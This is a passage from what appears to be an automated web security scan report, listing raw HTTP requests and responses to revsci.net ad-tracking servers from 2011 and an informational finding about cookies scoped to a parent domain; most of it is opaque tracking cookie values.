3AIc/QKBNjPUub61ya2Yeam0YNeI4XUBKw1I8arhmHwBw24bTrJB78myPAavjRhXseaoyMiRz2SpgrQict90ITDGOCmvQzQHHUwrMEuS4OMOI9nlvFiigkXOsxfJqbwLbPJxK7vepa4gP5k5reKfLJLOzB1tAhyu+0M+ogOQqwjKAaQSNYVRfyphA/AzKCF02DWfoPvuUecdYTEKFjQ1VG+g3YxKNYroKXLd8VGMnDiPqMcBJGPJAP5XjR0FOhbahAhbE9hcU3YzJtc0N15WcuBwumA6aiTCtPbC5GocnaApsWij2wpzPNdaYaar/KwBLK+unvGZw9So2/L8umdKyijf1qIYR3BsN1iRRVSFtpq1rjLe/12ruK+l5hbTSkGCxSxVj27tdXKbj+wNhb0Grx0f0RVz96JdXLab+X7gER0OWV6Ub93Iau3V3nA8U2eR3eW8WCzYma60upmY8LQB1Wa9Fjetzfo="; rsi_segs_1000000=pUP15EOheQIMp6aIYFMFwqgWKICRGi4LkSGHuoVo77dVqa7OUgcXqUqruxUK6pw26DoqAlJFLZfT4Ux5SbqTCquHuUc/XRFeRyFWPT6EN6ib9rOgornIgakmFz75BmUiSaHo+JZst/oPR9Zq4Tt2uVGJOix55hSkJ3LJKPQI1gnqJcPO+B0wk0qpMSQXyFuCqQpK8r5tYBj/bmtqBKECRDiwMULcazzRzzBdevJ3YZlw1fzc91DujPMvIrU3lBGHD+Oj3GY34vTCgAsALTSPABX9K+qdf26V67jxb2rFhuao8e8wHgc9RUGL1UarXrcKQoVg0O/dT54uSAyDaigAqzmSFzhzgmZT9BJMxPzc4NCP+DgolO7MVTtmzKnuBLvpPBvKHLv25Ok9kGqHBB+5DATvbNCMmEyH/IFwSZOzLes1MyDqRGKgNkRhQbjaoTJLPdtrCZICmiIGgDOjcsfvI7HUAbHc5uDjeMPwiZi1ff82KhtEfczsj5sp6lx5+8qHgTs7PhiC628AdVlOSeURpAhS+ptW; udm_0=MLv39SEJaSpn5l5JaNmEkuE3HUfpKukmYdMDpWl91ayhwRubWQXgIvDjbAfrg/29bOn80aspEjLkY0Vm5jykc8vlM+asjYXwUNBm8PAnICnqZmXPA2Xh4iXCZfVd0OlQYBkbXZ+fE6xbkp+73m7fIwK03br0hwtLMAEvv2rlPgGe89DL7XhfdVWhqZR9IJtOV/i1jO1ZeDNk5nGvWDb2PMoNNxQmAZ6zNXTvxPWzGQru57aNGbSPs5YITJ6dgGM+1EFQ7rwvQU/3y0FVcW/RyM2R9eN2xwK8bnOaT8VmyGaiJAmHHT8pBOIjlNDpzV6u3eTl4sJnmU/0g35ohvpAU8GROqgIjhxL+GgGWQd3fiucGGEQMG7fmNa3OPv4XHHRchnyjVtpb57h14/z5K85rTQ/KQRAVRDGCL+XD5TdnTh56FjyfTXn7JG824dYd5/r58WV/RlBw2/F8diIsfV//85J+E0pKIuSfQ+SwE6r0YYXff3vWeDASYs3zZpgv4oa69Fd5eAZ1Uv7/AHMTcD2hn04fTEwuRm02I/GkdiGiO/Oep/wYDuImtgU81hj8iDIv6L3GG8EGebm40kirwWY1y7cbY88ACfYnLhzClZQGGL8rkkwzr15uWlyzk3u6tiKLhMW/7hI0+en5ypPmrofnMOnqu7LSdBFwJUWwRWx/BdDZfZrSBLyd5FmjsyX8GtLepyF22ceWta1F40Fb6h1cnVajJZnBxwFGO4Zzc2jJx2RU8FnBu0kK+uWrNR9vrUYheYcw+lfxZWr8PUmbnVUirgeHvGExE4egj3Cmp3LNIEqIlUf0bA9h+7zUyYz4GsX4HrwVpb0+VSxxpbK6xrU4SoHOM3BkRCnuWgzboQ3SbPX1Nk3QZ5DzupOAyEap4dsztSqS78uAWyMcF4bxwbk+oyCbTDIeaKdmRwU4bXSHO+yQQb1hHHArA+1gn4reGVtXP++OVhSsGk9sy7OypPKnV6nIoneqia4DeQzD3Ayuxicz1pZ8HuWb1lz57GZY7s3AFPYaE+PKJaOZtO75ZQjhh61XrGDsiFWC1SrFQhJe3rOJ72O2/aPpYGLkNH+q0lALd+hspZ0xjUvUIH7YMLWdJfjOwcJdpeeojZ1zsAWiVEGHp9FYi1g5c1CP4qfluz8TpyDo/uEA6HTc7FOw+NdZRDrF0NHmENciJm6LX1drY/i89D5B/dqyRL0sAv+C/LiRm/IHGDoImZmxGi7o3CwQS42n0eLP9W9jCO0gTjQM8BFvoXdV0G2yONS0bGBprUcVrzLpG2UbPzBLFdo9j6kKHuOLQO8QVU=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_t9sN=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhMHIMN6L9XiOlhjCqMTK6h6pMhgM0dgR2ZLwQuK591A7FUMhc07fslEjp0ID+u123pQJ2WOOcFehcGwRO3+GBodUoFsbRk/QoWYk4c6JHEfwMOMG014RVW/ae4EVImiihCtAOR7o00v1Av4W+67mjSX931yJFNEGnkXHKKGemM6oakhZYuNn++XSAaSD/KFcyeItwGqWmS5L1fWz3jOS657huku/N0SVSl2cJ3lUp4mzf/15P/SpH3uMjdcidqoplEHbuchfD9ywF3P66kGsfxYo1mxoy+orHpQk6PK6+svaFag8xPIug3kXteXuVX2UEJaBODIxOl+Ft328ehTKAqGkfpU+SdWY5lRxpDwKjYa958M7DcCelfS1RBfPRqtbqpB56CpIqfy8vz/43Wm1wI5tPyY6T7TDGk8a5yJjVF7BgBg2gp94t77lvFYAp63GPCqzUCUz4o8F2YAwwDQna6pVUUkDxayBLH6sVK6odcuFf/h6IqI+T1O4+4CkO2a0mUowSwIf12wRxvpzxTQhOmTfqLI4XiOI0TpY=; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:49 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Mon, 06-Jun-2011 13:59:49 GMT; Path=/
Set-Cookie: udm_0=MLv39SEpbjpv597JcdnUBqRXwE9C6/Cqf7FfeAwqkwUJYsjV1VT8Vwp9cVb9CgNYjp8en758sA0XKo3DVxS11pqXgVYJjIVBn6R522ynJl2ax8Qx/jpyP9nI5ve44EGi/bzdEoOJlM3XmoyD7igaU3tTFNgDCDCDUIu11dgC3DX1bT0q7kGCESAJ/Cv0EEqKp9GTH5HWhuYAdRKptwX4H8eQr7jJH0NNjc4WK/BQeyHLwV2o8cicUpdbjoeqF+cev+WKcahsupxIlPf0Hsa0+5IuLGQ/yjtOanPI2a5vgGwyXsCxH5I4Sw1RAJCmTI6so2Vx9lmyE3fLbl2ALlBW8LSiUVCJw8lTBn5whfY4Ll3AHOGg6BCa2fIHi7Ms7OHm/NTSgsiiWIDtT9stG8zt4df+tTP3Vv43ld6GTzrd1879JV7Hb6X0z0XPVlId/zXOw9aaQEeqgMKvOKO/hLHpLL4r0ht87tG9lRvvhCQx73uGgiJbbzIqpi+XxCySNV6PFfTGQPlDZMZdvrsS20nVypdg+3I6J/jerpCvbMmWz5JKypIa7XW+EYTAyScp1GV448RwTO3/o+YmVgmWRXZM8hmutXz2qy0amKv+fdpjQCyl4LHSRxS8q4S9dOkykun2Lsx75efp63cKH3AtBYanHLF6BOnMPRtQ1F6RXEkuC1mnpvuHU0/gnd2zn6PH0JAf42BAa7OU1+7J0uhxL21j42cgJQU42PRR28JdKFksuxuEtiv8eWZhIMpUDRCOm+F6HtKMzBY7QUa3LgMgvGvszHsaS643ktq8SXod+oiVmp+dG+uf9dqtgVZULhl8CkwS45O2RSPtGh0pn7rH2ci5vobjeAUr3OiIIqc1bC9chVBX5dC0gdf1ZNc+4q3ub+yMggdR+qI05aDPLp7yPvzUJhxmf/o8HxKTMy3YiZaFWQq2zvyja+wD978ZmaRKas1ckp1iwAG3cKuUKYU7KK8+yM7TCt9HliKKy8xo5nSSPTStnrR8C4vJDpbmfJV1dCDE0s+U49SGwHlQNapQ/M3eVlg9By4tHJ1FZh8YBx0GOVN9r0OC1O3WSANLVhkYVB0YDSwTSC4msldfh50Zhm2odNhEEKzdCxEoNIZrFBdYEX2NX1+GHcuqrtRLo7/4htbS9j2iHN1YwbInHOeUEj4lE42McjMkWUqocMtbk5zbuh3dEwhW5jdeFiQviIdK5WVVVa4tPFmLDZToCcDw/D3Xz7PVTBwjZ4ZmjIorRxiz3DVNcZA1aGFkc7CQb80Vid32ageq+r6e9QwNxDn9s9yJCTPoOp6O7MPYtm+2ZlJ2T8DsLvYbT9CQyUiB5atNm28mK1JE; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:49 GMT; Path=/
Set-Cookie: rtc_bhnH=MLvn9zU1JwprpgZts8KQPOfaDcghJRY/syRG3WmM3le4ahJ60DTLD9+eQw9TOWi3mDGoGjklUGHxoEY411AnlDFR7yxZ8S+5rurGG9f9pKwr4QIY3riFWwRW2/4Pe6fIj9pfpVEFteudvD/rxinl01fHUDRopiXl3GV8QG4osgcIGNdQx253r5pJdcwR9YNyu0DNQTJxMId3nnJVUuDBpShinKA4tGa1cJ5+Hi2h59O3EJ9kKg9GI5OyNT9anWrXE6ywNFSU8AW4cLbauLlR5eS2CLmnPIYYHKESl6oWWm0MTZXo6HvTRjOh3Kxjjr71vvRTm7L5Tz/0AbnlXpfN5o3CS5RjdMCB3pJQ2xQbBI3eRje/yubp9KxdtHOub8fTM28fZtJ4Ff2evOSytK6+rguHT8qBsX3nAF+4suLuuzKXbljxXplpid99mfevz1NlGM1rlme7TFJHFw4T1WuGDkF0/Bw+17f4hzOZ89iGWZOwrinriMKVgfY7jgoThgi2LCqlToo4fv3BlxJBfv516scfvSGQii09J+OKaow2IMFHec2le5u592GGLOoNfhzh0wpAqny0dXMRunGZyuZpmgLUxyUcKEwjHtT4X/AWCCCKORS/JMUrvxw3RAPJ6tF7CPQVmN7vqfcMGol2PIwqma6LxPH616WqLSzSnYgrsHT0TROIWZVFqnuaJM072T0MT5VgEjbfrOrd4LflERbjcTxSI2oeuTXiK4/DDbsMpXxVYN1Y2+usrIA2tC4YKZcBieXRepuUWczdfoZq+FnW2fy54+8Ahj2DVr9lOeaPFz2YdxRA1DSkZ4p5j9nptFqVYRp7FQzd3L/rYbDcNwxsgNzSO1d/3MsEpZ+u6l/tYp6235d2EPF1lJvs+eY9ItWr2vywljErTzIjlFHOn3/vKN1lEO73a0MbZqAdadvoFSbLJ0FvE19rnlZr+jLJUArQXcyjG6qIfxe/x1qg9xSiD31RT940BPPNPFuSB3jU1xCgzxdwZN+cLq4+t59GjXdlNZMYlZEgjb2U0xa8rhgytOKQKj8cmLxuSqaEZ+rWPzIohHg8f7s/uwKkvXH7iStjrfLqN0iCTEktKJXa/EwxS3z/MCvPn1r/idkifyjhHKEVC9C8zVl28Q/obJ7v8A4+p79u6ECvoWawsZnxyX2Sk6D9FNVYNlOJvedTMFsJwjXTr5IfjCyqZk/UBqwFopBNsF8mpjRgy0jItxUL6s4Q7hJdKlt00izGkWFGjIaDJ5kgZqTbls7bo0uCnBhS0EivUGf5It9R036YZRZQhxLAMohm4BfvheaScBd0B6LD+dTsBOvBZt9qi8tKiSbAaWZAZG0kSm+xaQ8kjECVabgciinTfHRfdpcUgspdFtG/gYEj/BGsLUEDEDI7RiOCgIHqoGp9U8cm+NPOB87TWiP0V9cm6dG/MoQEGnmIEcpVMkMbUqQQPupK8MsZQ14dKvTqSRi8zQdNUKGRl/VBOD0x4AipEdvfcRFT77t0mzC0MtmgixiyT97l2MWc7nrXw+dbSqjkDo/V3VevRKGZiARbawBaubiTK1iTZ5X/QPG06n9m/GdUjFWTiJTeUtEsWyR/00AFRQ1ar060riKgW0WNe5vm1v/hmD2/AqXENoELyR0vXiP4im0//qAix0JrmEcuVRVnuzsHTORwkiEWyF8n88lfFjkZL4mXL6Ur0sWd4e2vaJRwp8A=; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:49 GMT; Path=/
X-Proc-ms: 37
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:48 GMT
Content-Length: 849

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['B08725_10011','D08734_70008','D08734_72078','B08725_50060','B08725_50578','B08725_50657'];
var rsiExp=new Date((new Date()).getTime()+2
...[SNIP]...
9.68. http://pix04.revsci.net/D08734/a1/0/0/0.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEIuMZ7FlTxCZ1EPDlWZ8EFI&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rtc_dGQ8=MLvntzE1JhpnJ5HLrv64joSEnGpKJDT5hxKcHQSZ6JT8viKgWFC/KkqPtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezrv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxT1XfsCBFwC57YYoJ8dUD0ufXIbI1AwqHU25HskJyoFKznw/sQhMPIHBJ73VP+WsQCcosoyebxnNQyk5bw9Bsr4Ajd4MGQyGjCMZs9RGNNK3gZkDTzt4/z2P/Ssv9/K+M83DKiwjAWi8utGtTdqyGb4IzhNu3lsN08QDZagfgB4l585OsT74yWCR/KejYXQTd4DW18xFu0u1sQaoaWTBOY/Jxq6p5u3FJalMuYrYBWmo4ctB0D/HgTzFFyfS+BUCo8wmacnHn4O/MsiR2LqU0m03bN27yxGajd0JW3dCdPkdZinY1oMQBDI5k5dohjorfehJRmVPiseZIe1egdAPJ2sDRkJZHabCSecm5jjK+CYjNinTqMghBbn4sodp/UCGYsEy7xf7J4OYFvLqndKiTaZQoJcUKc5oyzoKOM7++hWWLcTkob9bgmW9ufD3VkBebI8gJJxHhcKHrWm/eJZhnAjZdYP8LmVqJGER/ulNivQAr1Z9gh1pS4MHtL1CBSQLuxshNTfgm9Qnh83PhCXe6Yvk2VmX7Au4CemkqCTRRfHacCGSXK27rvSN58qKJgVMxMrJq29BzeVX0qGqvzZWmcCYGuyXUAPPKpj0eqmYV3+M63GrKuWMAA8+PbgoD5b7UZmM09hAnd1w2MxukZA3cMw0224znNvYvw3C0g+hDTgcn2mNvmM3NKx69VBxkjkOZxx6XZSBxHuDhwFRo0mFMBl0fKMGrF9xGVp42oFAH1EEod/28MSymYNvCbsfK4npaI+P8SK2x4V96vPHuTLDy/Cx6vHAh+vGlGwUBCANBff9nrluERrS+3Fyfx+Ui+p8hfo8cX2P+ETONPEfu+uP1+RCcG/400DyLJkt2SPTwT9pApTDqP6SZyya0LZzhosQBzN0pTIbzDXEeGOqYZP9VfGtLlYN69+lf/n0KwunQtrPfAR1dQ8puRIko3TButILht14pfWmofo5W0T3geacseWomgQLjLT3uFWX/HXp+K3yYMD+s1qh/O5fZ21itvVvyjurOJNHwPCBFNddUGGdHNUGO1T1Kyo42ZT/kMjgqiVSPrh+V27aJE522u9E5Uuvj48++J9zk0HAF4MP8pbMoeaq1U3zJHDdejn5X/BXm+thzK+Rj0hfGndyks5pZb2IvqvIrRO+Jh9lMW0WRh3MqKF/QUxLA0DV9lTInWhVKKDHCLf9B+Vr8d64IvjJ1SaxZM731RZxyn8HrvU6mZZo5hMLOYr95YzEFr9ZgdqU00kw90WgDPabslCoBnR8vLiP2BaVC7rX6eFBOv1ASiKQM9hdr0/ut12g3n8MYbIDtI7ghXyI31mAtBtWKqCrPU/eor48rAdH+FDHc8bvtoW73rj1Tpdq4/+oeY7fdYQjg3DsXB1bJFC2aHnkmzrR3l28WWFHb9D/32f+BBQA; udm_0=MLv39SEpLipv597JcdnUygV6rsvwpilMo4IXeAwquaRyre3gpPYIVAodYIp/pLDnrZ6pzwptsA0XKpUy7HBRG1IKyMiEh4VBn8RQKgHt6xmexyTANa3oP9nI5ve4Zh+cFpisilatsARekr/e1VTo6CfrY9ZOrKU59rPLHnZc0mKVcQ44RykdTAno/P8W1VY/OF5riAyTBWbBY+xYNSljIWcWOOtopIN1ZjQYZDMkgv8oJAkIGrSPg7YITZqDkGM+V0BX4IQvQU/ry0FVeR/RwM2R8eN2xwK8bXMaT8dnyGWiIwmFneP0q3borhBG+xrCFLFiU6qVr79K4V6YQuPzNuqA4/90ta/9VnFUEqhNTnmt1DrgJQOF4r1UEghYGiGgL7M7jrwbHJw9+F3CxjGnvmdNCsiiHDRDAMc/vfIfy1xA8L7rohMERi0dIDuvhqOPWEsI6+gjuwkRt93TDz/gwRoH3pOiO65cSq0JPJXL/eJxXICyA8Awu1c665ElpIHf+S2JzUt2IfmG6UqU7nNeIE7CqJ8wxwMGrI48La943kqanih8S8EHg93VfGjHcj2k0UdI+MOO5SUZtq0HZasWtuROl2/v/L3k3VhfBWMD9MKywUA3DZbUUdwgNu+Bc1D5GVtD/DFSVzHQd+Kthaux21W1VpYQzrJIOJqcfN+uFcepRaoHI2S6F+4MuQoZFMlFeSdfgpOqfSyBUa/S4SRDd2WkicgTYEf8w14nUrumB9cXOOs8IXQ3zkExOY2ILoGKzpi3VyhWA/E7FCSpV8XPeJUC3cephnvWTBkMkrOSNt+1c2G2kN2jJJu+t0Axdqd+gORvzH+Vh/dfmgaAk/YEKClysvExNZvw7tZ83xSC4kxPGUztLFNur6xF7/1lfGbJhpEOwNHvrxxdmXquPa98rGNTJlGE2KuHf96OXfa2fRUSFFdVEch+rdebr5A6GR+T8gEKpv5c/Kj/cUWy28+9cyQtHhLIz7E3JHVNRa1Iit99TBeVrjSUCEBciFZMwaQsrMtGEShvcBgNIKjzOM2bjkPTGk7U3NF9wbb7lKjRgR1a3vT+ePnQqbS+geKekpy0pYHIXkAz8rK/hMKwUUVuz/Sh6MkM2MO3MrV3kkzTtTQNj9q5xFCbt/phR+QzLH9cUhyOm+dQbNmQgiBz650QmznHkzThdkQ9qDa45Zs0ktlIz+ebUsOdl2IUiON4g2mdMKt5PQc62vmcGDUwYCvjBlm1gYSd9xvPi0tU6D3XX+oxjCU/9wnHCjGC8Y9JmhiMEF8QUbZgTzlV7IJD76HT9mUVgokd9gxAOQ==; rsiPus_xqR7="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8aleSaGIshOB9JrGlJ9XZP2PSMq545hyVBVJdSnkgvS5ixQ2jzsY0ZWA+JOFBhqviZCWubV71mmTZ/tW5l+pH2v6yDAOuX7qLwExVNaXzP2AMt2j6L/eVkJ61W1sllb6Nc3moNgaTi0sWkkQCbNz7hXNo2IsC53dW3VuuZsmJb9X0AgiDcheSzlnAsnUq4LYdtCMaskgIpbgmkSHb9PrS66rT7Grgzql7HtldL8iE5xypWITXabh97tTpkU/qmOFPl2cWsADKk2Rc1gNqCs/wCa2GpcRYzsBBlGWu1Rx6Ss0719jAJPt3A0/cgXMK9v1+nMWxleyRS9Py7rbiFbkbA4dy82s+YNiWD1Bp0B/8YPQvjz5m6VsPK2bApJbudN0kRmgDQwBFdNYNT3Zod7YBYp+BG3MVnzNBbnI+yHUMxY8gaTCU7GSuHnVmZTUzeXLyNzdjGXICYBnSWVVzTm1uYa+UU29wqPQ14C9Ay7tt6GPEWSA5zQxfYzeLi20J0Nl7IC6vXnM8Od1ipWmbzVPXl7hr95e/RGmwPBkmqRC5aamjDudjkvgSbR3b42ft+lD1GQzV25ioqJNKAAsRVoMjgqHOtgRDBe0DOKYrT+tMQWMGn6nEChsmBKyFveyHmvauyQe182HvP5WE9xxj/WW1VFGrZH10B6y51pelmZhY2yUVhLbCHFAF1wgg9I1NLCQ22j9FIDUznCf6vIcdZKG8/ZdiKwDfKAnA8AB53vXcXDFW+bqz0Qi9tJP3HFnfYb06h1kepNXQWZKlZVW8wLE6GcYgBaTn7Edmli85qT4S83vxtkUUbMAtf+b0E1nSeX3q+qrQ2YpBw97usUXF9qEw1Kga7ue4/koD8yQel/qNlEjame/tLJ0jduVB+ytBY9sF93mgbUlL2ZeG9dCIkZ+m+iWAynUZGRAG3mH4zdRt6QJFtJnrSudJUxkSp36hMpMqoyWjYf/0Dzxx8sSoHwbQLc7K4XYWzwFKXoqtXqULfas/iA=="; rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpj7P+LBAm++DA1mQ19Ktk0xHtNbUdnsuhledavN12kASJwVH5lHOqeC4o2fHI9QkQeon8inPHPsPHufQb0id4nnMJw2upjcbtYuTDvN446mDNk0rjriNSbgDKZc06/pZLd8/z5IM1+qarydvJImOaUCavF5tQ+vJTy0vmLIKK5JakfcZvZ6vY5TRBbUhvbhTFBLWagpBIVk9PAmF2iRJOeh7n11Dcn8bkilhzvJuOwSrWjLV4c1dKSmGQXQgUCCrlrfg5dBoy/uKX5D/DErzUQPBw5wzlcHY0pwcQ4ohqHveeUO1fCklYt3yNLi8Ih4fiXA7KtiQmAv01haIfBqzbc3dy7UBOXBFA5UQx+zZY6T+r0AEWHCqu9zrcpE/K+dhafAfZdl6F9XwAK29pKStK8Vmo/hIZWj6P4pKDIwHnsIzs/CsI6oGdONCs57jOPg55C+8Eo4w2eN8X6XGvloOwC16CAbvKgsBHdOES2thl/yLffPkkgsVchivYvx1DIgzI+Hp2cwp15/JafiVSeTecIJRVt18r+Pf6AVQ9smmgMCZPjqwiXHhyXFqLJwepQkHnViNF27BPMR76afEDXmQK4X5YtD+7lbiGoEtKEsos76lXkFDeXHHplOgEvw0R+YSyi6fZVTgUbyYjzKicP8ItTRSjGP+9wmw4+6IWPluELGIVZSpte+L2p8Ak8G+6f39QiQNX9sYMuyPRDbuBHfKyeNWHJBFhuqK4/xZ7D/CTqehq/ghqdhipMBw5Tkr8mdUR/zxczguAqS4lU2jGjyE9g5myCi05INSSRNE5L4DNh54JKfld0ePji0KKkmwnQEKhnIFcxkTlb237bhRQDP++3zP1j2hiLU3mg4xi1Bay7LsKGEYilyYgtuJxssb25KbKk0l2Nx+BftGsREymmYzUPlB6j58myYGRehdpGh0wJvXFJhEomvMt3+RVVtU/Hs/dJeH/HekE15CjTKMwIovoWyWLWkLk/6AzLofDM76Xj3/75JEbK9bptsRjxMDFAem9ySqV4jf0esg7pJ4iPlT5pMZ10V4CW1LSJQcWkybORfD0N5UTmssjs9H6zArVaijt0fVauRh7dRVBdULPsaJ7riVOn6Uyy3PpnD9ux5E93rqsEK1x7fbJO18nv264KJ7YWZM5gXP2LEWHxvabbxbwwGJ1QhIMhDB0OoWtqmkDKiV/MucnamXFEmet8G/Cjst1gkpmYPuG6pBgUPehivSI0fOzA0wV/YCP1uYirYyEalVKutJsu2eWT6Je8BzKdbq10UjW6IpkVn4Go3iH0RzBFoGh24tA44C3aKTJa/2frujwGy2nzvvlF0sL6Rj1PGg46xmLjjYE5SjtBW0D/I+k61vl+3uQyzZb33wWkGruFU4eK51kxOG6IX6C3L2EZDPaFw5tQnQjHUEIn0UPw/CZ7yH+a0h5BL5t32WMOXQTwq/Vl4lnroXyo6Vhf1SzulnavN4Twzu12B47v"; rsi_segs_1000000=pUPF5EOhMHIMN6L9XiOlhjCqMTK6h6pMhgM0dgR2ZLwQuK591A7FUMhc07fslEjp0ID+u123pQJ2WOOcFehcGwRO3+GBodUoFsbRk/QoWYk4c6JHEfwMOMG014RVW/ae4EVImiihCtAOR7o00v1Av4W+67mjSX931yJFNEGnkXHKKGemM6oakhZYuNn++XSAaSD/KFcyeItwGqWmS5L1fWz3jOS657huku/N0SVSl2cJ3lUp4mzf/15P/SpH3uMjdcidqoplEHbuchfD9ywF3P66kGsfxYo1mxoymsoZetPIFP0ffNDfMLjjNFIzKlvZuUgbFfaFOL6AbG7GUvAjTSSs+fN0pT1Ek1A1O3Uawg8CYDi1iW8H0kygALN2qJ+ws9ZOH3ugpCLaZ5feHz0JxquchN2/rq+HLLuOZ8U7xE84mx8cR/xmi3McKUrpVsIwOgHBRuY4DkmM2frlPEGSBPv7VbJ1gOdXtavZhpvWa4MynECuel295hxlggN5joS+oL6zR/BvNNYxTBk/8bUbqkGRIF2YopY8aJfkcZJg/g==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP15E+huAIMpqaIQFMFwqim7poa4bfK4iOHXhPolbdVqa7OUicFRaeJooUUZKyvzikWg1yU5VOL4SH98fVP+0bvuYvT98yo6AuyG3zQot2ZK0rTT30MK82st/RfAQXd0e3teEOxGv4Ph9AwHIZ1r0JXvnQEJBLiNC2Qmw5zUh/2xCnE7vS9RhWCRcgXYwstF/tN/Twdv9MqSTfibQAPE/oy0/MmgD0Vgyit1cyeZrhj2w6dNiPCY5yRlo6UThJKQL9WwzKoNrohHt3g+txoW4cFF0UZxpcSc3lkiFVSkAF8Zx71EADQGCrK6368/nClPUfbjU4Cpze0L0jbuqbGEL9imT0CkqLw4rJOF1sWW2MSfjeBJ6KpJoIegVLFup6y6GOnNuuYxizVH4uMSpHiLRoO8bnrD70d2NhoSx2TWqxWTAGmxOqPSS9SJMcTSCfB7rat99g/YdSkI3qHgMVsh/+uO9HMop9kplDuVS9M0SWgK66SJTr6D7taVuUHi66coxnwj+rapAOX8UUoMP9djOT3sxH6qQ==; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:45 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv39SEpbjpv597J8Z/sedPASVAo7kUMabFDwwxM9fNymV5Jd3DiIIGZ9hzJY33P3A+KF6wiqFdSDm7XsO1D30h8nbg5ShUOfaMZUXlHgKDlP891Rgb7CrQjbMluCqBxnLyqCbuFlIidjr74v7ceUZsp8QQLP4xHlqmGmRHLcLJ4Kk77fasSI9KiCV5fxtszoDyelrs2ELA6WYMNXyBK+qhERER9snh+M9GFAHjvJlk8+4Lsc7gdC92Bwaouy7oEcYO9jXpLgIb4OTdHtjx+++9FeBrwVBpzb6OZvHTFOydJxLQjwztIAlpXjbof/4C0cDbjTlABS2Run1F+Ig5heqcmGC9pEBGkhQSKSNPhHhfN/POpo5KA1SqctxnQyPn/2dmR1b4Lxv7mGIXTJqOrWmYLy61LI14ajPO/Xdt/PPxG8DHvgqgx/rvr+23vw7+UeJNuds4SmY+GstgYKvyS2xT11uUuuRhflSA/ksT28Wyg0usQ13X8Qi3v9GmNih9O/ZM3Dk+nN7X2e6tlIPWl2SLxgsUvq4lr//zmex87LZC0lXIzIrKCOkdgY29hwm3NjChXDulB7pLp/xx4t33391nSKDrbqdHhcloObMsj3s7iQSQa0/PE60Qj46hwU/YSTF7gYhMk5rQioyC8Fsqialev0/0ZXyk2G0xyDlDuDBa3Ovjyoxk8kjCW+jso2+Ll4uqejrrmUdojatyq8mhgcsSHIVwF5yLdpuq25X//i1ULUFkFggeXwUn4F56T3LMS7ZNFr